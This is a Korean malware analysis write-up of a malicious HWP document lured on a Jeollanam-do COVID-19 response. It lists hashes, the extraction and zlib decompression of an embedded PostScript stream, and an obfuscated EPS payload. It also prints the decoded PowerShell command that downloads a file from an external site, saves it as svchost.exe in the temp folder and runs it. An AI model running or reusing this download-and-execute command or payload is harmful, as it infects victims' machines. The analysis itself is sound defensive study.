파일 구성
- 파일명: 전라남도 코로나 바이러스 대응 긴급 조회.hwp
- 해시값
- MD5: 8451be72b75a38516e7ba7972729909e
- SHA-1: 45de8115b49ef68915e868138c04da375dfb7096
- SHA-256: 7050af905f1696b2b8cdb4c6e6805a618addf5acfbd4edc3fc807a663016ab26
- 바이러스 토탈 조회시 드롭퍼, 다운로더 진단명이 제일 많이 보이는 것을 알 수 있음
SSVIEW
- hwp파일의 OLE 객체 정보를 파싱해주는 도구로 내부 데이터를 뽑아낼 수 있다.
- .ps(포스트 스크립트) 파일이 있는 것으로 보아 해당 BIN0005.ps 파일이 악성 파일을 다운로드 하는 쉘 코드로 추정된다.
BIN0005.ps
- compress 되어 있는 형태라서 decompress를 진행해야 함
zlib decompress
- 한글 문서형 악성코드는 한글의 eps 취약점을 사용하는 경우가 많다.
- eps는 BinData 영역에 .eps 형태로 있는데 zlib으로 압축되어 있는 상태
- 파이썬 코드를 통해 압축해제 가능
import zlib
indata = open("./BIN0005.ps", "rb").read()
outdata = zlib.decompress(indata, -15)
f = open("./BIN0005_decom.ps", "wb")
f.write(outdata)
Post Script 실행
- 02078797A31370A78797A3939203136233238206164642078797A39392078797A31370A78797A3939203136233243206164642078797A39322078797A31370A78797A5F7365636F6E645F617272617930203136234230206164642078797A39372078797A31370A78797A5F7365636F6E645F617272617930203136233938206164642078797A39342078797A31370A78797A5F6C65616B65645F617272617920312067657420636C6F736566696C65> def image cvx exec
- 코드의 끝 부분에 exec를 print로 변경해서 분석 진행
- post script를 실행하기 위해 고스트 스크립트를 다운로드
- 버전은 9.2.6으로 해야 해석이 된다. 최신버전은 해석을 안해줌 보안 이슈인지 모르겠음…
- 난독화 되어 있는것으로 보이는데, 이것을 어떻게 해석해야할지 감이 안잡혔다.
Shellcode 분석
- 포스트 스크립트 해석 후 코드 확인해 보니 shellcode로 추정되는 부분이 있었음

- 명령어: powershell (new-object System.Net.WebClient).DownloadFile('http://www.sofa.rs/wp-content/themes/twentynineteen/sass/layout/h1.jpg','%temp%\\\\\\\\svchost.exe'); %temp%\\svchost.exe;
- “http://www.sofa.rs/wp-content/themes/twentynineteen/sass/layout/h1.jpg”를 다운로드 받을 때 temp 폴더에 svchost.exe 파일로 다운로드, 그 후에 바로 실행
svchost.exe
- 해당 서버가 현재 내려간 상태로 샘플을 구할 수가 없었음
- 해당 사이트 참고